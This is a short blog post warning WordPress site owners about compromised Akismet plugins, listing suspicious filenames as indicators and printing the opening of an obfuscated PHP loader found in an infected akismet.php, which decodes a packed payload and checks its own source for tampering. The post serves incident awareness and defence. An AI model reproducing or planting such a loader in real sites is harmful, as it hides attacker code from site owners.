Akismet Hacked

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks.

If any of these files are showing up in your plugins folder, you may be the subject of an attack:

  1. .akismet.cache.php
  2. .akismet.bak.php
  3. .akismet.old.php
  4. class-akismet.php
  5. db-akismet.php

One akismet.php file that I found started out something like this:

<?php if (!function_exists("TC9A16C47DA8EEE87")) {
    function TC9A16C47DA8EEE87($T059EC46CFE335260) {
        $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
        $TC9A16C47DA8EEE87 = 0;
        $TA7FB8B0A1C0E2E9E = 0;
        $T17D35BB9DF7A47E4 = 0;
        $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
        $TBF14159DC7D007D3 = 3;
        $T77605D5F26DD5248 = 0;
        $T4A747C3263CA7A55 = 16;
        $T7C7E72B89B83E235 = "";
        $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
        $T43D5686285035C13 = __FILE__;
        $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
        $T6BBC58A3B5B11DC4 = 0;
        preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
        for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
            if (count($T6BBC58A3B5B11DC4)) exit;
            if ($T4A747C3263CA7A55 == 0) {
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                $T4A747C3263CA7A55 = 16;
            }
            if ($T65CE9F6823D588A7 & 0x8000) {
                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                if ($TC9A16C47DA8EEE87) {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                } else {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                    $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                    $TBF14159DC7D007D3++;
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                }
            } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
            $T65CE9F6823D588A7 <<= 1;
            $T4A747C3263CA7A55--;
            if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                return $T43D5686285035C13;
            }
        }
    }
};
?>

If you want the PHP code, which is obfuscated, for the akismet.php file I came across, visit this page: http://codepaste.net/jc2996

See this post regarding the Pharma Hack for more information.

Related Posts:

  • No Related Posts
This entry was posted in Security, Web Development and tagged , , , . Bookmark the permalink.

One Response to Akismet Hacked

  1. Alberto says:

    在wordpress3.2下会报错,提供日志给楼主分析。Warning: fopen(xxxx/wp-content/themes/iBluety/style.css) [function.fopen]: failed to open seratm: No such file or directory in xxxx/wp-includes/functions.php on line 4339Warning: fread(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4342Warning: fclose(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4345Reply

Leave a Reply

Your email address will not be published. Required fields are marked *